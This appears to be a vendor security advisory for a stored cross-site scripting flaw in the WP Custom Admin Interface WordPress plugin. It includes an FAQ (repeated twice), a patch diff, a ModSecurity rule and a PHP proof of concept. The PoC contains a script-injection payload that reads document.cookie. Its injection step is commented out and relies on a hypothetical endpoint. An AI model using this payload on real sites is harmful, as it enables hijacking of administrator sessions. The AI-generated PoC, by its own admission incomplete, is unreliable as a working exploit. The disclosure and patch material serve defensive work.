What is CVE-2026-32521?

CVE-2026-32521 is a stored cross-site scripting (XSS) vulnerability found in the WP Custom Admin Interface plugin for WordPress. It affects versions up to and including 7.42, allowing authenticated users with subscriber-level access or higher to inject malicious scripts that execute when other users access affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s code. Attackers can exploit this by injecting malicious scripts into their display name or user ID, which are then stored and executed when another user views the plugin’s settings page.

Who is affected by this vulnerability?

Any WordPress site using the WP Custom Admin Interface plugin version 7.42 or earlier is vulnerable. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WP Custom Admin Interface plugin installed. If it is version 7.42 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the WP Custom Admin Interface plugin to version 7.43 or later, where the issue has been patched. Regularly check for updates to all plugins to maintain security.

What does the CVSS score of 6.4 mean?

The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while the risk is not the highest, it is significant enough that exploitation could lead to serious consequences, such as unauthorized actions or data theft.

What are the practical risks of this vulnerability?

If exploited, this vulnerability could allow attackers to steal session cookies, perform actions as the victim user, or redirect users to malicious sites. Although the impact is limited to the admin area, it poses a risk to site integrity and security.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can log in as a subscriber, inject a malicious script into their display name, and when an admin views the settings page, the script executes. This illustrates the ease of exploitation and the potential consequences.

What coding practices led to this vulnerability?

The vulnerability was caused by insufficient output escaping for user-supplied data in the plugin’s code. Specifically, user information was directly echoed into HTML without proper sanitization, allowing for script injection.

What changes were made in the patched version?

In the patched version 7.43, proper output escaping functions were implemented. Variables are now sanitized using functions like esc_attr() and esc_html() to prevent the execution of injected scripts.

How can I stay informed about vulnerabilities?

To stay informed, regularly monitor security advisories from trusted sources, subscribe to vulnerability databases, and participate in WordPress security forums. Keeping plugins and WordPress core updated is also crucial for maintaining security.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to the admin area to reduce the risk of exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 30, 2026

CVE-2026-32521: WP Custom Admin Interface <= 7.42 – Authenticated (Subscriber+) Stored Cross-Site Scripting (wp-custom-admin-interface)

CVE ID CVE-2026-32521

Plugin wp-custom-admin-interface

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 7.42

Patched Version 7.43

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32521:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Custom Admin Interface WordPress plugin. The issue affects plugin versions up to and including 7.42. It allows attackers with subscriber-level or higher permissions to inject arbitrary JavaScript into the plugin’s administrative interface, which then executes in the context of any user viewing the affected page. The CVSS score of 6.4 reflects a medium severity rating.

The root cause is insufficient output escaping for user-supplied data in the plugin’s user selection interface. The vulnerable code resides in the file `wp-custom-admin-interface/inc/options/options-output.php` at line 1979. The `echo` statement directly concatenates the variables `$userId`, `$userDisplayName`, and `$userRole` into an HTML span element without sanitization. These variables originate from WordPress user objects. A second vulnerable location exists in `wp-custom-admin-interface.php` at line 1880, where the same variables are concatenated into the `$outputOfUsersAndRolesSelection` string without escaping.

Exploitation requires an authenticated attacker with at least subscriber privileges. The attack vector is the plugin’s administrative AJAX endpoint or form handler used to manage user visibility settings. An attacker would submit a malicious payload within their own display name or user ID field, which the plugin then unsafely reflects. The payload would be stored and executed when an administrator or other user loads the plugin’s settings page, triggering the `echo` statement in `options-output.php`.

The patch adds proper output escaping functions. In `options-output.php`, the fix wraps `$userId` with `esc_attr()` for the HTML data attribute and wraps `$userDisplayName` and `$userRole` with `esc_html()` for content within the span. In `wp-custom-admin-interface.php`, the fix applies `esc_html()` to `$userDisplayName` and `intval()` to `$userId` before concatenation. These functions neutralize HTML control characters, preventing script execution. The plugin version number is also incremented to 7.43.

Successful exploitation leads to stored XSS. Attackers can steal session cookies, perform actions as the victim user, deface the admin interface, or redirect users to malicious sites. Since the vulnerability requires only subscriber-level access, a large user base could potentially exploit it. The impact is limited to the WordPress admin area, but this still provides a significant foothold for further compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-custom-admin-interface/inc/options/options-output.php
+++ b/wp-custom-admin-interface/inc/options/options-output.php
@@ -1979,7 +1979,7 @@



-                echo '<li class="user-item"><div><i class="fa fa-eye-slash remove-user-item" title="Hide user" aria-hidden="true"></i><span id="user-name" style="font-weight: bold;" data="'.$userId.'">'.$userDisplayName.' <em style="font-weight: normal;">('.$userRole.')</em></span></div></li>';
+                echo '<li class="user-item"><div><i class="fa fa-eye-slash remove-user-item" title="Hide user" aria-hidden="true"></i><span id="user-name" style="font-weight: bold;" data="'.esc_attr($userId).'">'.esc_html($userDisplayName).' <em style="font-weight: normal;">('.esc_html($userRole).')</em></span></div></li>';

             }
             //end container
--- a/wp-custom-admin-interface/wp-custom-admin-interface.php
+++ b/wp-custom-admin-interface/wp-custom-admin-interface.php
@@ -4,7 +4,7 @@
 *		Plugin Name: WP Custom Admin Interface
 *		Plugin URI: https://www.northernbeacheswebsites.com.au
 *		Description: Customise the WordPress admin and login interfaces and customize the WordPress dashboard menu.
-*		Version: 7.42
+*		Version: 7.43
 *		Author: Martin Gibson
 *		Developer: Northern Beaches Websites
 *		Developer URI:  https://www.northernbeacheswebsites.com.au
@@ -1877,8 +1877,7 @@
             $userDisplayName = $userFirstName.' '.$userLastName;
         }

-
-        $outputOfUsersAndRolesSelection .= 'User: '.$userDisplayName.'('.$userId.'),';
+        $outputOfUsersAndRolesSelection .= 'User: '.esc_html($userDisplayName).'('.intval($userId).'),';

     }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-32521
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100032521,phase:2,deny,status:403,chain,msg:'CVE-2026-32521 via WP Custom Admin Interface AJAX',severity:'CRITICAL',tag:'CVE-2026-32521',tag:'wordpress',tag:'wp-plugin',tag:'xss'"
  SecRule ARGS_POST:action "@rx ^wp_custom_admin_" "chain"
    SecRule ARGS_POST "@rx ["'<>]" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32521 - WP Custom Admin Interface <= 7.42 - Authenticated (Subscriber+) Stored Cross-Site Scripting
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Payload to inject into the user's display name
// This will execute when an admin views the plugin settings
$malicious_display_name = '"><script>alert(document.cookie)</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check for a successful login by looking for the admin dashboard URL
if (strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// The plugin likely uses an AJAX action or admin POST handler to update user settings.
// The exact endpoint and parameter names must be identified through reverse engineering.
// This PoC outlines the attack flow but requires the specific action hook.
// Example AJAX request structure (uncomment and fill correct action/params):
/*
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'wp_custom_admin_update_user', // Hypothetical action name
    'user_display_name' => $malicious_display_name,
    'nonce' => 'retrieved_nonce_from_page'
)));
$ajax_response = curl_exec($ch);
*/

// After injection, the payload will be stored.
// When an administrator visits the plugin's settings page (e.g., /wp-admin/admin.php?page=wp-custom-admin-interface),
// the malicious script will execute in their browser.

echo 'Proof of concept framework. Specific endpoint and parameters require further investigation.n';
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-32521?
Overview of the vulnerability
CVE-2026-32521 is a stored cross-site scripting (XSS) vulnerability found in the WP Custom Admin Interface plugin for WordPress. It affects versions up to and including 7.42, allowing authenticated users with subscriber-level access or higher to inject malicious scripts that execute when other users access affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s code. Attackers can exploit this by injecting malicious scripts into their display name or user ID, which are then stored and executed when another user views the plugin’s settings page.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the WP Custom Admin Interface plugin version 7.42 or earlier is vulnerable. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the WP Custom Admin Interface plugin installed. If it is version 7.42 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this vulnerability?
Steps to secure your site
To mitigate this vulnerability, update the WP Custom Admin Interface plugin to version 7.43 or later, where the issue has been patched. Regularly check for updates to all plugins to maintain security.
What does the CVSS score of 6.4 mean?
Understanding the severity rating
The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while the risk is not the highest, it is significant enough that exploitation could lead to serious consequences, such as unauthorized actions or data theft.
What are the practical risks of this vulnerability?
Potential impact on users
If exploited, this vulnerability could allow attackers to steal session cookies, perform actions as the victim user, or redirect users to malicious sites. Although the impact is limited to the admin area, it poses a risk to site integrity and security.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can log in as a subscriber, inject a malicious script into their display name, and when an admin views the settings page, the script executes. This illustrates the ease of exploitation and the potential consequences.
What coding practices led to this vulnerability?
Root cause analysis
The vulnerability was caused by insufficient output escaping for user-supplied data in the plugin’s code. Specifically, user information was directly echoed into HTML without proper sanitization, allowing for script injection.
What changes were made in the patched version?
Improvements in security
In the patched version 7.43, proper output escaping functions were implemented. Variables are now sanitized using functions like esc_attr() and esc_html() to prevent the execution of injected scripts.
How can I stay informed about vulnerabilities?
Best practices for security awareness
To stay informed, regularly monitor security advisories from trusted sources, subscribe to vulnerability databases, and participate in WordPress security forums. Keeping plugins and WordPress core updated is also crucial for maintaining security.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to the admin area to reduce the risk of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations